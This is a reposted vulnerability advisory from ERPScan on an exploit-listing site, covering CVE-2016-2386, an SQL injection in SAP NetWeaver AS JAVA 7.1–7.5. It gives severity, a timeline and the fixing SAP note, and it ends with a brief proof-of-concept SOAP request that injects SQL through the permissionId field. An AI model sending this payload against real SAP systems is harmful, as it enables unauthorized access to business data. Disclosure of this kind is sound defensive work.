SAP NetWeaver AS JAVA 7.1 < 7.5 - SQL Injection

🗓️ 19 May 2016 00:00:00Reported by ERPScanType

zdt🔗 0day.today👁 512 Views

SAP NetWeaver AS JAVA 7.1-7.5 SQL Injection - Critical vulnerability, allows privilege escalatio

Reporter	Title	Published	Views	Family All 21
0day.today	SAP NetWeaver J2EE Engine 7.40 - SQL Injection Exploit	11 Jan 201800:00	–	zdt
GithubExploit	Exploit for Exposure of Sensitive Information to an Unauthorized Actor in Sap Netweaver	10 Jan 201809:14	–	githubexploit
ATTACKERKB	CVE-2016-2386	16 Feb 201600:00	–	attackerkb
BDU FSTEC	The vulnerability of the SAP NetWeaver software integration platform allows a hacker to execute arbitrary SQL commands.	2 Mar 201600:00	–	bdu_fstec
Circl	CVE-2016-2386	14 Jun 202321:10	–	circl
CISA KEV Catalog	SAP NetWeaver SQL Injection Vulnerability	9 Jun 202200:00	–	cisa_kev
CNVD	SAP NetWeaver J2EE Engine UDDI Server SQL Injection Vulnerability	18 Feb 201600:00	–	cnvd
Check Point Advisories	SAP NetWeaver J2EE Engine SQL Injection (CVE-2016-2386)	20 Jun 202200:00	–	checkpoint_advisories
CVE	CVE-2016-2386	16 Feb 201615:00	–	cve
Cvelist	CVE-2016-2386	16 Feb 201615:00	–	cvelist

Application:  SAP NetWeaver AS JAVA
Versions Affected:  SAP NetWeaver  AS JAVA 7.1 - 7.5
Vendor URL:    http://SAP.com
Bugs:    SQL injection
Send:     04.12.2015
Reported: 04.12.2015
Vendor response:  05.12.2015
Date of Public Advisory:   09.02.2016
Reference:   SAP Security Note 2101079
Author:    Vahagn Vardanyan  (ERPScan)
 
 
Description
 
1. ADVISORY INFORMATION
 
Title: SAP NetWeaver AS JAVA – SQL injection vulnerability
Advisory ID: [ERPSCAN-16-011]
Risk: Critical
Advisory URL: https://erpscan.com/advisories/erpscan-16-011-sap-netweaver-7-4-sql-injection-vulnerability/
Date published: 09.02.2016
Vendors contacted: SAP
 
 
2. VULNERABILITY INFORMATION
 
Class: SQL injection
 
Impact: Resource consumption
Remotely Exploitable: Yes
Locally Exploitable: No
CVE: 2016-2386
CVSS Information
CVSS Base Score v3:  9.1 / 10
CVSS Base Vector:
AV : Access Vector (Related exploit range) Network (N)
AC : Access Complexity (Required attack complexity) Low (L)
Au : Authentication (Level of authentication needed to exploit) None (N)
C : Impact to Confidentiality High (H)
I  : Impact to Integrity High(H)
A : Impact to Availability None (N)
 
 
3. VULNERABILITY DESCRIPTION
 
An SQL injection vulnerability means that a code comprises an SQL
statement that contains strings that can be altered by an attacker.
The manipulated SQL statement can be used to gain additional data from
the database or to modify the information.
 
 
4. VULNERABLE PACKAGES
 
SAP NetWeaver AS JAVA 7.1 - 7.5
 
Other versions are probably affected too, but they were not checked.
 
 
5. SOLUTIONS AND WORKAROUNDS
 
To correct this vulnerability, install SAP Security Note 2101079
 
 
6. AUTHOR
 
Vahagn Vardanyan  (ERPScan)
 
 
7. TECHNICAL DESCRIPTION
 
By exploiting this vulnerability, an internal or external attacker can
escalate their privileges. This access allows obtaining sensitive
technical and business-related information stored in the vulnerable
SAP system.
 
 
PoC
 
POST /XXX/UDDISecurityImplBean HTTP/1.1
Content-Type: text/xml
 
<SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  XXX
 
<permissionId>x' AND 1=(SELECT COUNT(*) FROM BC_UDV3_EL8EM_KEY) or
'1'='1</permissionId>
 
XXX
 
</SOAP-ENV:Envelope>
 
 
8. REPORT TIMELINE
 
Sent:   04.12.2015
Reported:    04.12.2015
Vendor response:   05.12.2015
Date of Public Advisory:   09.02.2016
 
 
9. REFERENCES
 
https://erpscan.com/advisories/erpscan-16-011-sap-netweaver-7-4-sql-injection-vulnerability/

#  0day.today [2018-03-14]  #

19 May 2016 00:00Current

9.6High risk

Vulners AI Score9.6

EPSS0.44457